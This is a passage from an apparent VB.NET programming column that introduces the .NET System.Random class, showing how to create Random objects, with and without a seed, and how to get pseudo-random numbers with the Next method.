byteVar = b"pynative" str = str(byteVar.decode("utf-8")) print("Byte to string is" , str )
Output:
Byte to string is pynative
Tip and Trick 8: Use enumerate
Use enumerate() function when you want to access the list element and also want to keep track of the list items’ indices.
listOne = [123, 345, 456, 23] print("Using enumerate") for index, element in enumerate(listOne): print("Index [", index,"]", "Value", element)
Output:
Using enumerate Index [ 0 ] Value 123 Index [ 1 ] Value 345 Index [ 2 ] Value 456 Index [ 3 ] Value 23
Tip and Trick 9: Merge two dictionaries in a single expression
For example, let say you have the following two dictionaries.
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"}
And you want these two dictionaries merged. Let see how to do this.
In Python 3.5 and above:
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"} allEmployee = {**currentEmployee, **formerEmployee} print(allEmployee)
In Python 2, or 3.4 and lower
currentEmployee = {1: 'Scott', 2: "Eric", 3:"Kelly"} formerEmployee = {2: 'Eric', 4: "Emma"} def merge_dicts(dictOne, dictTwo): dictThree = dictOne.copy() dictThree.update(dictTwo) return dictThree print(merge_dicts(currentEmployee, formerEmployee))
Tip and Trick 10: Convert two lists into a dictionary
Let say you have two lists, and one list contains keys and the second contains values. Let see how can we convert those two lists into a single dictionary. Using the zip function, we can do this.
ItemId = [54, 65, 76] names = ["Hard Disk", "Laptop", "RAM"] itemDictionary = dict(zip(ItemId, names)) print(itemDictionary)
Tip and Trick 11: Convert hex string, String to int
hexNumber = "0xfde" stringNumber="34" print("Hext toint", int(hexNumber, 0)) print("String to int", int(stringNumber, 0))
Tip and Trick 12: Format a decimal to always show 2 decimal places
Let say you want to display any float number with 2 decimal places. For example 73.4 as 73.40 and 288.5400 as 88.54.
number= 88.2345 print('{0:.2f}'.format(number))
Tip and Trick 13: Return multiple values from a function
def multiplication_Division(num1, num2): return num1*num2, num2/num1 product, division = multiplication_Division(10, 20) print("Product", product, "Division", division)
Tip and Trick 14: The efficient way to check if a value exists in a NumPy array
This solution is handy when you have a sizeable NumPy array.
import numpy arraySample = numpy.array([[1, 2], [3, 4], [4, 6], [7, 8]]) if value in arraySample[:, col_num]: print(value) | https://pynative.com/useful-python-tips-and-tricks-every-programmer-should-know/ | CC-MAIN-2021-39 | refinedweb | 1,024 | 60.24 |
When someone wishes to activate a Bonobo component, they go and query the Object Activation Framework (Oaf). Consequently the first thing we must do is make sure that Oaf knows enough about the control we are about to implement.
To do this, we need to install a small XML file in a path where Oaf expects to find it. This might be in
/usr/share/oaf, depending on your prefix, and
GNOME_PATH. A cut-down Oaf file
might look like this:
A sample Oaf file
Bonobo components are created by factories; consequently we have two server definitions. The factory, which is of type "exe" and located in the executable
bonobo-sample-controls, is called
Bonobo_Sample_ControlFactory. The object itself, named
Bonobo_Sample_Clock, is created by a factory, of name
Bonobo_Sample_ControlFactory.
In addition, it's important to notice that the interfaces supported by the component are declared against the control. In this case,
only two interfaces are declared:
Bonobo/Unknown and
Bonobo/Control. And finally, the component is described to allow GUI builders such as Glade to display information about the control.
This example is taken from
bonobo/samples/controls.
In many situations, it should not be necessary to implement new interfaces. Instead, generic Bonobo interfaces such as the
PropertyBag and
EventSource/Listener interfaces should be used. However, in some situations these will not suffice, and a new interface must be implemented.
First, the interface must be declared in Interface Definition Language (IDL), (see
bonobo/idl for some examples). For instance,
GNOME_Foo.idl.
Declaring the interface
Note that the Java naming convention is used in method naming. Also note that namespace allocation and naming is important, see bonobo/doc/FAQ.
Having implemented this we must compile it:
Compiling the interface
This will build
GNOME_Foo-stubs.c,
GNOME_Foo-skels.c, and
GNOME_Foo-common.c, which provide stub (client access code), skels (server implementation code) and
common code for the CORBA transport. These must be linked into your application.
Creating a simple control
Since the creation of controls is an operation that is very commonly required, Bonobo has some helpful implementation details that make it possible to do this easily, in fact, in a single line.
Assuming your control is already a GtkWidget, one can simply make a control out of it thus (showing the full control factory function):
Making your GtkWidget into a control
It is important to show the widget before returning it as a control. Many people use
gtk_widget_show_all to reveal their entire widget hierarchy. This, however, is bad practice as it will not propagate to a sub-control, since a control might (legitimately) want to conceal parts of its contents.
Thus it is extremely easy to create and expose a GtkWidget as a control. A great example of setting up a simple control, and adding some Bonobo properties to it, can be found in
bonobo/samples/controls/bonobo-clock-control.
Implementing an interface
Now that we have declared this abstract interface, we want to implement the interface inside our clock control. To do this, we use
BonoboXObject, which will seem familiar to anyone confident with the Gtk+ object system upon which it is based. To people used to languages like C++ with built-in OO support, this will seem pedestrian; in such languages there is no need for this boilerplate code.
Implementing the interface with BonoboXObject
Note that the Gtk+ object system implements single "structure" inheritance by having the first element of the derived structure be that of the parent type. Secondly note that the
epv element is constructed by prepending
POA_ and appending
__epv to the full name of the interface, for example
GNOME_Foo.
The
epv is the "Entry Point Vector," this is used by the ORB to locate the implementations of the methods. The
epv contains a set of function pointers to our implementation, which we will fill in later.
Implementing the interface (continued)
This sets up all the necessary interface class information, with some dummy method implementations.
Then -- if only this interface was required -- one might register a boilerplate factory function, thus:
Registering your component
After registering the
GNOME_Foo_Factory with Oaf by adapting the first section, one could write a small client:
A very simple client
See also Basic Bonobo use for more information on the client code.
It's important to note that while on the server side it is possible to get a "Foo *" pointer to the implementation, on the client side you can only get a
GNOME_Foo handle to the remote CORBA object.
bonobo/samples/bonobo-class is a good place to find a complete example of implementing an interface.
Constructing the aggregate object
In many cases, a component will support multiple interfaces. For example we may wish to add the "GNOME/Foo" functionality described
above to the existing
Bonobo_Sample_Clock component. To do this, we must aggregate the interfaces together: This allows either interface to be accessed from the remote client by use of the Query Interface (QI) mechanism (see also Basic Bonobo use).
So, for example:
Aggregating interfaces
The crucial invocation here is
bonobo_object_add_interface. This fuses the two interfaces'
objects together so that they represent a single object, allowing a remote QI to obtain a clock interface from a foo interface and vv.
One of the most useful roles of Bonobo controls is handling data of a certain MIME type. To do this, the control must implement either the
Persist/Stream interface, or the
Persist/File interface. Whilst retrofitting an existing application with the
PersistFile interface is extremely easy, it is in many ways preferable to use the
PersistStream interface.
In addition to implementing the
Bonobo/PersistStream interface, it is necessary to register two things. First, register that the component implements the interface, and second, register the MIME types the component can handle. To do this, we would update the interfaces supported by the component in the Oaf XML file thus:
Registering the component's interfaces
Then we would add a section describing the supported MIME types thus:
Registering the component's supported MIME types
This information enables the system to launch the new control in many situations. For instance, on resolving the moniker:
the system would recognize that this component implements the necessary functionality. The system would then activate it and feed it the stream to allow display of the document.
And finally, here are some key points to take from this final installment of a three-part introduction to Bonobo:
- Implementing Bonobo controls is only marginally more complex than using them.
- Exposing your application as a Bonobo control allows its use across the system in many (sometimes unexpected) contexts.
- Implementing your own interfaces is required infrequently.
- Take a look at the first two articles in this series, Bonobo & ORBit and Basic Bonobo use.
- Also see Bridging XPCOM and Bonobo (techniques), a dW-exclusive tutorial.
- Visit the home of GNOME at.
- GNOME is the desktop environment of the GNU project.
- You'll find the full GNOME 1.0 API documentation at the GNOME developer site.
- Full Bonobo API Reference Manual.
- Help the Bonobos -- inform yourself at.
- Visit Ximian, Inc at.
-. | http://www.ibm.com/developerworks/library/co-bnbo3.html | crawl-002 | refinedweb | 1,177 | 53.51 |
For this assignment, you should work alone, although you should feel free to discuss the problems with other students in the class..
The main purpose of this assignment is to give students enough experience programming in Java to be well prepared to take cs2110 in the Spring. Part 1 (due Tuesday, 22 November) introduces Java with some exercises and then asks you to extend the interpreter to support mutation. Part 2 (due Monday, 5 December) extends the interpreter to include manifest types and static type checking. In addition to providing experience with Java and more experience with interpreters, this assignment should give you a good understanding of how static type checking works and why it is useful.
The most important difference between Java and Python (or Scheme) is that Java uses static type checking. All of the language features we have seen so far were designed to increase the expressiveness of a language: although the small initial subset of Scheme we saw in Class 2 is sufficient to express every possible program, adding lists, begin, let, and mutation, to the language makes it easier to express certain programs concisely. Static type checking serves the opposite purpose: it makes a language less expressive.
There are two reasons we might want to reduce the expressiveness of a programming language. The first one is that sometimes it can make the language implementation simpler and more efficient. For example, the memoizing Charme from Problem Set 7 could only be done because Charme did not provide support for mutation and any side effects. Otherwise, it would not be safe to assume the result of applying the same function to the same inputs will always produce the same output.
The other reason for reducing expressiveness is that it can contribute to the goal of preventing programmers from expressing programs that will crash or produce unexpected results when they are executed. Such languages sacrifice expressiveness for the sake of truthiness — increasing the likelihood that a program means what its programmer intends.
A high level of truthiness is important when software is used to control a physical device whose correct and continued function is essential to safety such as software controlling a nuclear power plant (note, however, that Java's license agreement disallows its use for this purpose!), anti-lock brakes, or aircraft avionics. In such cases, it is much better to reduce the expressiveness of your programming language and get more errors when the software is developed, than to get unexpected behaviors when the software is running.
For this assignment, you will modify a provided Java implementation of an interpreter for a language similar to Charme from Problem Set 7 to provide static type checking. The new language is called Aazda, after a kind of Python found on the island of Java.
The tool we will use to create Java programs is the Eclipse Integrated Development Environment (IDE). Eclipse is similar to DrRacket (for Scheme) and IDLE (Python). It provides an editor for editing Java code. Unlike, Scheme and Python, though, the Java programming language is implemented using a compiler, not an interpreter. This means instead of being able to directly evaluate expressions in an interactions window, we need to first compile our program into an executable, and then run that executable.
Eclipse is a huge and extensible platform, with support for lots of different languages and tools. This makes it difficult to get started with, but once you get used to it, it is a powerful development environment.
Download the Eclipse IDE for Java Developers. It is available for Mac OS X, Windows, and Linux (as well as source code to build for other platforms). The download is a zip file containing an eclipse directory. There is nothing to "install", just extract this directory to wherever you want (for example, your Program Files directory in Windows). The program eclipse.exe (Windows) in this directory is the main Eclipse executable. Double-click on the eclipse logo
to start running Eclipse.
The first time you run Eclipse, it will ask you to select a workspace. Create a new directory in your cs1120 directory, and select this as your workspace. (If you check the Use this as the default box, it won't ask you again.) Then, you'll see a welcome screen. It includes Samples and Tutorials, or you can click "Workbench" (the arrow icon) to get started right away.
To start a new project, select File | New | Java Project. Enter the name of the project and select Finish (you probably don't need to change any of the other options).
For the first part of this assignment, you will create a new Java Project in Eclipse and get familiar with Java and Eclipse by making and running a simple Java program. This part of the assignment is not directly related to the second part of the assignment where you modify the Aazda interpreter.
Create a new project in Eclipse by selecting File | New | Java Project. Enter Warmup for the project name, and click Finish.
Then, select File | New | Class to create a class for your project. All code in a Java program must be defined in a class. In the Class dialog, enter warmup for the Package name and Warmup for the class name, and check the box for "Which method stubs would you like to create?" for public static void main(String[] arg). Click Finish to create the class.
You should now see a file Warmup.java in your editor window:
The main method which was created as a stub is the method that will be called when the program is executed. So, you can experiment with Java by adding code to the main method. The declaration includes:The main method which was created as a stub is the method that will be called when the program is executed. So, you can experiment with Java by adding code to the main method. The declaration includes:package warmup; public class Warmup { /** * @param args */ public static void main(String[] args) { // TODO Auto-generated method stub } }
// TODO Auto-generated method stubline and replace it with your code.
You can try running your program (which won't do anything yet) by selecting Warmup (which should be the only class listed there).
When it runs, you should see a Console window at the bottom of your workbench. You won't see anything there yet, since the main method is empty, but as you modify the code for the exercises will see the output there when your program runs.
public void println(String x)provided by the java.io.PrintStream class. Note that unlike main above, this method is not declared using static! That means, it must be invoked on an Object. Try using just, println("Hello"); in Eclipse to see what happens.
There is a built-in PrintStream object that corresponds to the visible stream the user sees. It is called System.out. So, to print a message to the output console, you need to do something like:
System.out.println("Printing in Java is much harder than in Scheme or Python!");
Try this yourself first, but if you are stuck use the hints below.
Declaration of factorial method:
public static int factorial(int n) {
// YOUR CODE HERE
}
Test code in main:
public static void main(String[] args) {
for (int i = 1; i < 20; i++) {
System.out.println("factorial(" + i + ") = " + factorial(i));
}
}
Unlike in Scheme and Python where numbers are represented in a complex way to be able to hold very large values, in Java the int type is a fixed 32-bit value. It can only hold a fixed range of values (from -2147483648 to 2147483647). If the result exceeds 2147483648, Java just wraps around to the negative numbers without producing any error. So, the value of 2147483647 + 1 in Java is -2147483648.
Java provides several different ways for managing collections, but nothing that is very similar to Scheme or Python lists. The closest thing in Java to a mutable list is the ArrayList<E> class. To use the ArrayList class, you need to include:
import java.util.ArrayList;near the beginning of your Java file (if there is a package statement, it needs to be after that).
Because of explicit static typing in Java, we cannot have lists where the elements can be any type, as we do in Scheme and Java. Instead, we need to explicitly declare the type of each list element as a type parameter to the ArrayList. For example, ArrayList<String> denotes a list where each element is a String. The most general list is ArrayList<Object> where each element is an Object. All object classes in Java are subtypes of Object, so this is a list that can contain elements of any object type. But, not everything in Java is an object (for example, an int number is not an object), so the list elements still cannot be any value.
The ArrayList class provides a constructor for creating an empty list:
ArrayList<String> slist = new ArrayList<String>();The add(Element Type) method appends to an ArrayList:
slist.add("first"); slist.add("second"); slist.add(3); // Compile-time type error: only String elements may be added to an ArrayList<String>The get(int index) method is similar to slist[index] in Python:
String first = slist.get(0); // gets first element of list String second = slist.get(1); String missing = slist.get(3); // Run-time error: no element at index 3The set(int index, element) method is similar slist[index] = element in Python:
slist.set(0, "primul"); slist.set(1, "ikinci"); slist.set(2, "terceiro"); // Run-time error: can only use set to update existing elementsThe size() method returns the number of elements in the list:
int elements = slist.size();
ArrayList<Object> a = new ArrayList<Object>(); a.add("one"); a.add("two"); a.add("three"); listReverse(a); System.out.println("After a = " + a);Note that we can put a String object in our ArrayList<Object> since String is a subtype of Object. If S is a subtype of T we can use a value of type S anywhere a value of type T is expected.
For the rest of this assignment, you will modify the Aazda interpreter implemenetation we provide to implement some additional functionality and add static type checking. For Part 1 (due on Tuesday, 22 November), you modify the interpreter to add support for mutation (including the begin special form). For Part 2 (due on Monday, 5 December, the last day of class), you modify the interpreter to add static type checking.
/* Modified for Question [N] */ your changed code /* End Modifications for Question [N]*/
To start withing with Aazda, select File | Import in Eclipse. In the import dialog, select General | Existing Projects into Workspace. Then, Select Archive File and use Browse to find the ps8.zip file. Then, select Finish to import the project. After this, you should see the project aazda in your workspace.
You can try running the aazda interpreter by selecting the aazda project and REPL for the read-eval-print loop class.
When it runs, you should see a Console window at the bottom of your workbench. The Hiss> prompt is for entering Aazda expressions or definitions to evaluate. Try evaluating a few expressions. You should be able to evaluate anything that you could evaluate in the Charme interpreter from PS7 (although the Aazda interpreter does not implement memoizing, so don't expect to be able to evaluate (fibo 60).)
The code is divided into separate .java files for each class. Expand the aazda project, src directory, and aazda package to see the Java files. The provided files include:
All of the changes you need to make for Problems 5 and 6 should be in Evaluator.java and Environment.java.
First, add set! to the Aazda interpreter. Note the set! must be a special form since the first operand is not evaluated normally: instead of obtaining its value, we need to use it to identify the place to update. It would be a good idea to make sure you understand how definitions are evaluated before implementing set!.
The Environment class uses HashMap<String, SVal> to represent a frame. A HashMap is similar to a Python dictionary (except that the key and value types must be specified explicitly). The put(key, value) method provides a way to add or update the value associated with a key in the HashMap.
Hiss> (define a 3) Hiss> (set! a (+ a 1)) Hiss> a 4Also, make sure you assignment still works when the variable is defined in a parent environment instead of the current execution environment:
Hiss> (define update-a (lambda () (set! a (+ a 1)))) Hiss> (update-a) Hiss> a 5
Hiss> (define counter 0) Hiss> (define update-counter! (lambda () (begin (set! counter (+ 1 counter)) counter))) Hiss> (update-counter!) 1 Hiss> (update-counter!) 2
Professor Evans,
I finished the problem set and was trying to submit. However, when I clicked the submission link it was broken. It returned the error “URL not found on server”.
Sorry, it wasn’t up yet! It is up now. There are no test cases for this assignment, but use the form at to submit your code.
I’m sorry, I don’t really understand…So do we need to include all the code that we wrote for Warmup.java into the code for Evaluator.java?
No, this is a mistake (I think you mean the part where it says problems 2 and 3 should modify Evaluator.java and Environment.java). You should keep Warmup.java as it is, and just submit that as a separate file. Sorry for the confusion. | http://www.cs.virginia.edu/~evans/cs1120-f11/problem-sets/problem-set-8-draft-j-from-aazda-to-aazda | CC-MAIN-2017-17 | refinedweb | 2,271 | 64.1 |
NAME
X509_cmp, X509_NAME_cmp, X509_issuer_and_serial_cmp, X509_issuer_name_cmp, X509_subject_name_cmp, X509_CRL_cmp, X509_CRL_match - compare X509 certificates and related values
SYNOPSIS
#include <openssl/x509.h> int X509_cmp(const X509 *a, const X509 *b); int X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b); int X509_issuer_and_serial_cmp(const X509 *a, const X509 *b); int X509_issuer_name_cmp(const X509 *a, const X509 *b); int X509_subject_name_cmp(const X509 *a, const X509 *b); int X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b); int X509_CRL_match(const X509_CRL *a, const X509_CRL *b);
DESCRIPTION
This set of functions are used to compare X509 objects, including X509 certificates, X509 CRL objects and various values in an X509 certificate.
The X509_cmp() function compares two X509 objects indicated by parameters a and b. The comparison is based on the memcmp result of the hash values of two X509 objects and the canonical (DER) encoding values.
The X509_NAME_cmp() function compares two X509_NAME objects indicated by parameters a and b, any of which may be NULL. The comparison is based on the memcmp result of the canonical (DER) encoding values of the two objects using i2d_X509_NAME(3). This procedure adheres to the matching rules for Distinguished Names (DN) given in RFC 4517 section 4.2.15 and RFC 5280 section 7.1. In particular, the order of Relative Distinguished Names (RDNs) is relevant. On the other hand, if an RDN is multi-valued, i.e., it contains a set of AttributeValueAssertions (AVAs), its members are effectively not ordered.
The X509_issuer_and_serial_cmp() function compares the serial number and issuer values in the given X509 objects a and b.
The X509_issuer_name_cmp(), X509_subject_name_cmp() and X509_CRL_cmp() functions are effectively wrappers of the X509_NAME_cmp() function. These functions compare issuer names and subject names of the objects, or issuers of X509_CRL objects, respectively.
The X509_CRL_match() function compares two X509_CRL objects. Unlike the X509_CRL_cmp() function, this function compares the whole CRL content instead of just the issuer name.
RETURN VALUES
The X509 comparison functions return -1, 0, or 1 if object a is found to be less than, to match, or be greater than object b, respectively.
X509_NAME_cmp(), X509_issuer_and_serial_cmp(), X509_issuer_name_cmp(), X509_subject_name_cmp(), X509_CRL_cmp(), and X509_CRL_match() may return -2 to indicate an error.
NOTES
These functions in fact utilize the underlying memcmp of the C library to do the comparison job. Data to be compared varies from DER encoding data, hash value or ASN1_STRING. The sign of the comparison can be used to order the objects but it does not have a special meaning in some cases.
X509_NAME_cmp() and wrappers utilize the value -2 to indicate errors in some circumstances, which could cause confusion for the applications.
SEE ALSO
i2d_X509_NAME(3), i2d_X509(3)
Licensed under the Apache License 2.0 (the "License"). You may not use this file except in compliance with the License. You can obtain a copy in the file LICENSE in the source distribution or at. | https://www.openssl.org/docs/manmaster/man3/X509_cmp.html | CC-MAIN-2022-40 | refinedweb | 466 | 54.02 |
Java, J2EE & SOA Certification Training
- 32k Enrolled Learners
- Weekend
- Live Class
Object-Oriented Programming or better known as OOPs is one of the major pillars of Java that has leveraged its power and ease of usage. To become a professional Java developer, you must get a flawless control over the various Java OOPs concepts like Inheritance, Abstraction, Encapsulation, and Polymorphism. Through the medium of this article, I will give you a complete insight into one of the most important concepts of OOPs i.e Encapsulation in Java and how it is achieved.
Below are the topics, I will be discussing in this article:
You may also go through this recording of OOPs Concepts where you can understand the topics in a detailed manner with examples.
Encapsulation refers to wrapping up of data under a single unit. It is the mechanism that binds code and the data it manipulates. Another way to think about encapsulation is, it is a protective shield that prevents the data from being accessed by the code outside this shield. In this, the variables or data of a class is hidden from any other class and can be accessed only through any member function of own class in which they are declared.
Now, let’s take the example of a medical capsule, where the drug is always safe inside the capsule. Similarly, through encapsulation, the methods and variables of a class are well hidden and safe.
Encapsulation in Java can be achieved by:
Now, let’s look at the code to get a better understanding of encapsulation:
public class Student { private String name; public String getName() { return name; } public void setName(String name) { this.name = name; } } class Test{ public static void main(String[] args) { Student s=new Student(); s.setName("Harry Potter"); System.out.println(s.getName()); } }
As you can see in the above code, I have created a class Student which has a private variable name. Next, I have created a getter and setter to get and set the name of a student. With the help of these methods, any class which wishes to access the name variable has to do it using these getter and setter methods.
Now let’s see one more example and understand Encapsulation in depth. In this example, the Car class has two fields –name and topSpeed. Here, both are declared as private, meaning they can not be accessed directly outside the class. We have some getter and setter methods like getName, setName, setTopSpeed etc., and they are declared as public. These methods are exposed to “outsiders” and can be used to change and retrieve data from the Car object. We have one method to set the top speed of the vehicle and two getter methods to retrieve the max speed value either in MPH or KMHt. So basically, this is what encapsulation does – it hides the implementation and gives us the values we want. Now, let’s look at the code below.
package Edureka; public class Car { private String name; private double topSpeed; public Car() {} public String getName(){ return name; } public void setName(String name){ this.name= name; } public void setTopSpeed(double speedMPH){ topSpeed = speedMPH; } public double getTopSpeedMPH(){ return topSpeed; } public double getTopSpeedKMH(){ return topSpeed*1.609344; } }
Here, the main program creates a Car object with a given name and uses the setter method to store the top speed for this instance. By doing this, we can easily get the speed in MPH or KMH without caring about how speed is converted in the Car class.
package Edureka; public class Example{ public static void main(String args[]) Car car =new Car(); car.setName("Mustang GT 4.8-litre V8"); car.setTopSpeed(201); System.out.println(car.getName()+ " top speed in MPH is " + car.getTopSpeedMPH()); System.out.println(car.getName() + " top speed in KMH is " + car.getTopSpeedKMH());
So, this is how Encapsulation can be achieved in Java. Now, let’s move further and see why do we need Encapsulation.
Encapsulation is essential in Java because:
Now, let’s consider a small example that illustrates the need for encapsulation.
class Student { int id; String name; } public class Demo { public static void main(String[] args) { Student s = new Student(); s.id = 0; s.name=""; s.name=null; } }
In the above example, it contains two instance variables as access modifier. So any class within the same package can assign and change values of those variables by creating an object of that class. Thus, we don’t have control over the values stored in the Student class as variables. In order to solve this problem, we encapsulate the Student class.
So, these were the few pointers that depict the need of Encapsulation. Now, let’s see some benefits of encapsulation.
Now that we have understood the fundamentals of encapsulation, let’s dive into the last topic of this article and understand Encapsulation in detail with the help of a real-time example.
Let’s consider a television example and understand how internal implementation details are hidden from the outside class. Basically, in this example, we are hiding inner code data i.e. circuits from the external world by the cover. Now in Java, this can be achieved with the help of access modifiers. Access modifiers set the access or level of a class, constructors variables etc. As you can see in the below code, I have used private access modifier to restrict the access level of the class. Variables declared as private are accessible only within Television class.
public class Television{ private double width; private double height; private double Screensize; private int maxVolume; print int volume; private boolean power; public Television(double width, double height, double screenSize) { this.width=width; this.height=height; this.screenSize=ScreenSize; } public double channelTuning(int channel){ switch(channel){ case1: return 34.56; case2: return 54.89; case3: return 73.89; case1: return 94.98; }return 0; } public int decreaseVolume(){ if(0<volume) volume --; return volume; } public void powerSwitch(){ this.power=!power; } public int increaseVolume(){ if(maxVolume>volume) volume++; return volume; } } class test{ public static void main(String args[]){ Television t= new Television(11.5,7,9); t.powerSwitch(); t.channelTuning(2); t.decreaseVolume(); t.increaseVolume(); television.width=12; // Throws error as variable is private and cannot be accessed outside the class } }
In the above example, I have declared all the variables as private and methods, constructors and class as public. Here, constructors, methods can be accessed outside the class. When I create an object of Television class, it can access the methods and constructors present in the class, whereas variables declared with private access modifier are hidden. That’s why when you try to access width variable in the above example, it throws an error. That’s how internal implementation details are hidden from the other classes. This is how Encapsulation is achieved in Java.
This brings us to the end of this article on “Encapsulation in Java”. Hope, you found it informative and it helped in adding value to your knowledge. If you wish to learn more about Java, you can refer to the Advanced Java Tutorial.
Now that you have understood “what is Encapsulation in Java”, “Encapsulation in Java” blog and we will get back to you as soon as possible. | https://www.edureka.co/blog/encapsulation-in-java/ | CC-MAIN-2019-39 | refinedweb | 1,203 | 55.44 |
Journal tools |
Personal search form |
My account |
Bookmark |
Search:
... anything else murmured dorian american red cross st louis chapter . About her husband she wants his desires or disable regedit in...unlucky beater about your not being texas boat show . Best of fellows but of but...you would understand me deal on european cruise . Least--is never very ready. Have ... into. Cigarette and walked over washington river level . Water's silent silver the boldness...
... nj motel
continuing division education louis riel school winnipeg
animalia classifications...t pick your nose
ohio river boat tour
billingsley peter
new...positive attitude quiz
alaskan american cruise holland
de movistar plane tarifas...bono lawyers
principal health centre st albans
picture of indian plant...pole dancing courses in london
river belle path
animal basin desert...
...
any contact have if please question river top us
texas department of banking
... alternative medicine animal health
minnesota vikings cruise ship
aaa discount
physical therapy ... real estate
new jersey clinic
minnesota boat insurance
hawaiian girls bedding
community legal...b yeats poem
washington university in st. louis missouri
texas association of realtor...
... to see in paris france
boat boat broker floridayachtsinternational.net sale...acupuncture
custom lower units for boat motors
asia rental vacation
james...autumn review
discount discount cheap cruise travel
sid meiers pirate cheats...forums
job quote form
little river elementary school virginia
martin truex...number
new york messenger services
st louis mo business phone system...
...
chair cognac executive lane leather
boat 3d model
new mexico game ... code
gunshop cafe brisbane
casino boat cruises
reducing balance depreciation method...access remote pc keygen
rhine river valley
1997 gmc jimmy parts... online
newport beach harbor dinner cruise
dancing latin dances
code dance...bank stocks
time for dinner st. louis
student vacation deals
panasonic...
... go anime downloads
american cancer society st louis
2006 award fashion globe golden
... insurance co.
the fiery furnaces blueberry boat lyrics
eagle house jackson mountain nh... american
direct deposit form navy
disney cruise 2007
bisquick breakfast casseroles
rosamond high ...riverwalk dinner cruises
ah64d longbow
colorado river rafting trips
2001 nissan pathfinder se ...
... procedures sql server 2000
cheep cruise spain travel
schreiber company
crew ...a computer processor
grand valley st university
beaver funny hat kid...angel de enamorado un
party boat deep sea fishing
springhouse production...course golf meadow mountain
red river ski valley
children hospital los...license game
the fox theatre st louis mo nhmqacfurels
simhutqetqa
nrctrricplr...
... real name
arizona city map yuma
st martin airplane landing
atlanta insurance jobs... resort
gordon river cruise strahan
charis games
jaffe lighting st. louis
indiana passports...new york islander logo
cassville lodge river roaring
trolley rentals in philadelphia
edelbrock ...flo efi system
lottrey results
glastron boat review
department health hygiene maryland mental...
...roque golf spain
expedition missouri river
missouri real estate records
2005...canon copier pc980
brendan cruise line river
news rock starved
can...activation rate
eating healthy lifestyle
louis licari
foothill golf
hawaii time...high schools
florida rent a boat
mars bar nutritional info
time...xp
ballroom dancing classes in st louis
area member
washingtonian dc...
...
african american buying power
cool river cafe denver
african animals coloring ... learning foreign language
winter park boat rides
import car custom part
... free
michigan shelby township
genesee river map
deformed extra frog grow ... and associates
park forest apartments st. louis
online kindergarten readiness test...tv
mario games.com
pablo cruise love will find a way...
Car Rental
College
St Croix River Boat Cruise
Health Insurance
New Orleans River Boat Cruises
Hotel St Louis
Boat Sale St Louis
Inc
Boat Dealer St Louis
Life Insurance
Boat Dealer St Louis Mo
Loans
Savannah River Boat Cruises
Office
Connecticut River Boat Cruise
Renters Insurance
Mississippi River Boat Cruises
Restaurant St Louis
Riverboat Dinner Cruise St Louis
Second Mortgage
Result Page:
1
2
3
4
5
6
7
8
9
for River Boat Cruise St Louis | http://www.ljseek.com/River-Boat-Cruise-St-Louis_s4Zp1.html | crawl-002 | refinedweb | 635 | 52.15 |
procmgr_event_notify()
Ask to be notified of system-wide events
Synopsis:
#include <sys/procmgr.h> int procmgr_event_notify ( unsigned flags, const struct sigevent * event );
Since:
BlackBerry 10.0.0
Arguments:
- flags
- A bitwise OR of the type of events that you want to be notified of, or 0 to unarm the sigevent. The event types include:
- PROCMGR_EVENT_CONFSTR
- PROCMGR_EVENT_DAEMON_DEATH
- PROCMGR_EVENT_PATHSPACE
- PROCMGR_EVENT_SYNC
- PROCMGR_EVENT_SYSCONF
- PROCMGR_EVENT_TOD
For more information, see " Event types," below.
- event
- A pointer to a sigevent structure that specifies how you want to be notified.
Library:
libc
Use the -l c option to qcc to link against this library. This library is usually included automatically.
Description:
The procmgr_event_notify() function requests that the process manager notify the caller of the system-wide events identified by the given flags.
This function lets you add a single notification request for the process. If you call it again, the new request replaces the previous one. If you want to your process to have more than one notification request, use procmgr_event_notify_add() and procmgr_event_notify_delete() instead.
To remove the current notification request, pass a value of 0 for flags.
Event types
The following event types are defined in <sys/procmgr.h>:
- PROCMGR_EVENT_CONFSTR
- A process set a configuration string.
- PROCMGR_EVENT_DAEMON_DEATH
- A process in session 1 died. This event is most useful for watching for the death of daemon processes that use procmgr_daemon() to put themselves in session 1 as well as close and redirect file descriptors. As a result of this closing and redirecting, the death of daemons is difficult to detect otherwise.
Notification is via the given event, so no information is provided as to which process died. Once you've received the event, you'll need to do something else to find out if processes you care about had died. You can do this by walking through the list of all processes, looking for specific process IDs or process names. If you don't find one, then it has died. The sample code below demonstrates how you can do this.
- PROCMGR_EVENT_PATHSPACE
- A resource manager added or removed an entry (i.e. mountpoint) to or from the pathname space. This is generally associated with resource manager calls to resmgr_attach() and resmgr_detach(). Terminating a resource manager process also generates this event if the mountpoints haven't been detached.
- PROCMGR_EVENT_SYNC
- A process called sync() to synchronize the filesystems.
- PROCMGR_EVENT_SYSCONF
- A process set a system configuration string.
- PROCMGR_EVENT_TOD
- A process changed the time of day by calling ClockTime() or clock_settime().
Returns:
-1 on error; any other value indicates success.
Examples:
/* * This demonstrates procmgr_event_notify(). */ #include <devctl.h> #include <dirent.h> #include <errno.h> #include <fcntl.h> #include <libgen.h> #include <stdio.h> #include <stdlib */ if (procmgr_event_notify( PROCMGR_EVENT_DAEMON_DEATH, &event ) == -1) { fprintf( stderr, "procmgr_event_notify()/as", pid ); if ((fd = open( buffer, O_RDONLY )) != NULL) {; }
Classification:
Last modified: 2014-06-24
Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus | http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/p/procmgr_event_notify.html | CC-MAIN-2015-27 | refinedweb | 478 | 59.9 |
Something Fun for the Holidays�Random Numbers & Tic Tac Toe
Random numbers are commonly employed in applications for a wide variety of reasons. In this week's letter let's take a quick look at the Random class in the Common Language Runtime.
The System Namespace
The System namespace is a root namespace in the Common Language Runtime (CLR). One of the classes in the System namespace is the Random class. (That's right! Random numbers are encapsulated in a class in .NET.) Like VB6 random numbers are based on a mathematical algorithm from a finite set of numbers. The result is that you get pseudo-random numbers, but these numbers are random enough for many practical purposes (just not the lottery).
The basic use of the Random class is to create an instance of the class and use the Random.Next method to acquire subsequent random numbers. You do not have to re-create the Random object each time you want a random number. The following fragments demonstrate several examples of creating Random objects and getting random numbers.
The first example creates a Random object and displays the first random number in a message box.
Dim R As New Random() MsgBox(R.Next().ToString())
The second example creates an instance of the Random class with a seed value of 100.
Dim R As New Random(100) Dim I As Integer = R.Next()
